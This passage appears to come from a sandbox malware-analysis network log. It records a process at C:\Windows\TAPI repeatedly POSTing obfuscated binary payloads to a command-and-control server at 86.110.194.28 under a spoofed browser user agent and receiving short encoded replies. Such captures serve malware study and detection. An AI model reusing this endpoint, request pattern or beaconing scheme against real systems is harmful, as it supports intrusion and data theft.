Connection: Keep-Alive
Jan 3, 2025 07:58:46.244508028 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:46.376009941 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 50064 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:45.683199883 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:46.394089937 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:46.528292894 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 50071 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:46.687335014 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:58:47.371433020 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:47.500478029 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 50077 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:47.802077055 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:48.507107973 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:48.636522055 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 50080 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:48.802850962 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:49.152419090 CET2516OUTData Raw: 5b 56 5b 5c 5d 59 55 58 54 5b 59 5a 5b 51 57 59 5f 51 5a 5a 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [V[\]YUXT[YZ[QWY_QZZRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<5_6*V&/,);='B52)S"4%P!;,Y%:73?<T)9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:49.488034964 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:49.624397993 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:49 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 50081 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:49.750730991 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:50.105673075 CET | 2516 | OUT | Data Raw: 5b 54 5e 5e 5d 5c 50 5d 54 5b 59 5a 5b 52 57 5b 5f 52 5a 59 52 56 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: [T^^]\P]T[YZ[RW[_RZYRVPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C<.=#*?%/<*813![2/9P"75T#<X0)0</(#Y'$X.5
Jan 3, 2025 07:58:50.444802046 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:50.575366020 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 50082 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:50.841310978 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:51.199306965 CET | 2516 | OUT | Data Raw: 5e 55 5b 5a 58 59 50 5c 54 5b 59 5a 5b 52 57 5b 5f 57 5a 55 52 57 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: ^U[ZXYP\T[YZ[RW[_WZURWPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(.>!*%)_$$2 7)Q 8?$'$+9#Y'$X.5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 50083 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:51.393728018 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2108
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:51.746181965 CET | 2108 | OUT | Data Raw: 5b 54 5e 50 58 5e 50 51 54 5b 59 5a 5b 50 57 53 5f 54 5a 5f 52 53 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: [T^PX^PQT[YZ[PWS_TZ_RSPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>2!9$R&$E(8*^$$)[11R"'*7; Y$#'/'?#Y'$X.
Jan 3, 2025 07:58:52.105254889 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:52.240370035 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 0d 1d 24 5a 31 3b 2d 02 2a 11 2f 5f 26 33 07 12 36 33 3b 05 2c 1e 2e 0b 35 3f 3d 5b 32 05 01 0e 28 04 3d 1c 28 1d 03 12 23 10 0b 1d 2b 20 28 5d 03 10 39 5b 2b 13 0e 01 2a 58 2a 06 39 27 0d 5b 24 37 2b 03 29 20 21 56 32 3c 04 10 35 03 3f 1e 28 30 2d 5f 30 5d 3c 5c 2b 1e 30 07 27 17 20 54 0b 17 27 1c 27 23 38 03 27 2b 3a 04 3d 27 34 12 33 2a 3a 0e 21 3c 2e 19 34 39 2c 5b 38 30 21 1f 27 16 21 53 3d 00 3f 55 31 3a 04 59 27 3b 2e 5c 23 0f 28 55 0d 34 57 50
Data Ascii: $Z1;-*/_&363;,.5?=[2(=(#+ (]9[+*X*9'[$7+) !V2<5?(0-_0]<\+0' T''#8'+:='43*:!<.49,[80!'!S=?U1:Y';.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 50084 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:51.538647890 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:51.886831045 CET | 2516 | OUT | Data Raw: 5b 54 5e 5b 5d 59 50 5b 54 5b 59 5a 5b 50 57 5a 5f 50 5a 58 52 50 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: [T^[]YP[T[YZ[PWZ_PZXRPPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D).%["9<U&>*$4"%<9S5'&#(Z00<,U+9#Y'$X.
Jan 3, 2025 07:58:52.273046970 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:52.410296917 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50085 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:52.543591976 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Jan 3, 2025 07:58:52.902462959 CET | 2516 | OUT | Data Raw: 5b 52 5e 5f 58 5f 50 5a 54 5b 59 5a 5b 52 57 5c 5f 52 5a 55 52 51 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: [R^_X_PZT[YZ[RW\_RZURQPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>#901,=+$\&1R!5 ^,$)C&<?+#Y'$X.5
Jan 3, 2025 07:58:53.256978989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:53.387706041 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50086 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:53.523921013 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2516
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 07:58:53.871269941 CET | 2516 | OUT | Data Raw: 5b 53 5e 5a 5d 5e 55 5b 54 5b 59 5a 5b 54 57 5b 5f 55 5a 5d 52 50 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
Data Ascii: [S^Z]^U[T[YZ[TW[_UZ]RPPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<=>!/10D*82[$=]%/)!75#+,Y0+0'(9#Y'$X.-
Jan 3, 2025 07:58:54.259656906 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:54.392146111 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        80 | 192.168.2.4 | 50087 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:54.514493942 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:54.871294022 CET | 2516 | OUT | Data Raw: 5e 50 5b 58 58 5f 50 5b 54 5b 59 5a 5b 55 57 58 5f 5d 5a 55 52 51 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[XX_P[T[YZ[UWX_]ZURQPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+=56 V&?;*;=$7)%&66#+#$)?$/0W+#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:55.233513117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:55.366475105 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:55 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        81 | 192.168.2.4 | 50088 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:55.499917984 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2504
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:55.855566025 CET | 2504 | OUT | Data Raw: 5e 57 5b 5f 58 5a 50 51 54 5b 59 5a 5b 57 57 5b 5f 51 5a 5b 52 51 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W[_XZPQT[YZ[WW[_QZ[RQPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<->62@((!061?"$78 ]0:;'(S?#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:56.189351082 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:56.329700947 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:56 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        82 | 192.168.2.4 | 50089 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:56.453041077 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:56.808780909 CET | 2516 | OUT | Data Raw: 5b 5d 5b 5c 58 5b 55 5c 54 5b 59 5a 5b 5f 57 5b 5f 57 5a 54 52 54 50 42 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [][\X[U\T[YZ[_W[_WZTRTPBZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B<>25/2<,)]!0%[%S!)W ($_+'Y;(#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:57.141479969 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        83 | 192.168.2.4 | 50090 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:57.254015923 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:57.605590105 CET | 2108 | OUT | Data Raw: 5b 54 5e 59 58 5c 50 5b 54 5b 59 5a 5b 50 57 5e 5f 52 5a 5a 52 55 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T^YX\P[T[YZ[PW^_RZZRUPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&<5"9$T%,*)$$%[1=Q6$&48$3, U<9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:57.951577902 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.086545944 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5c 25 2b 26 5b 3e 11 2f 59 31 30 3d 5e 21 0e 0e 14 2c 09 2e 09 21 3c 3a 03 25 02 38 1e 3c 5b 3d 18 29 23 03 1f 21 2e 21 1e 3f 30 28 5d 03 10 3a 05 3f 2e 2b 1f 2a 58 32 01 2c 34 27 17 24 0e 27 05 2a 20 39 13 25 12 35 0e 35 03 01 1e 3d 23 25 5b 27 05 01 02 2b 20 0d 12 27 17 20 54 0b 17 27 1e 33 30 06 01 31 06 25 5d 28 27 28 1f 27 39 25 53 22 02 0c 14 37 29 0a 16 2c 33 26 0f 27 2b 35 1e 2b 3e 27 56 32 14 21 01 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $\%+&[>/Y10=^!,.!<:%8<[=)#!.!?0(]:?.+*X2,4'$'* 9%55=#%['+ ' T'301%]('('9%S"7),3&'+5+>'V2!&;.\#(U4WP


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        84 | 192.168.2.4 | 50091 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:57.381808996 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
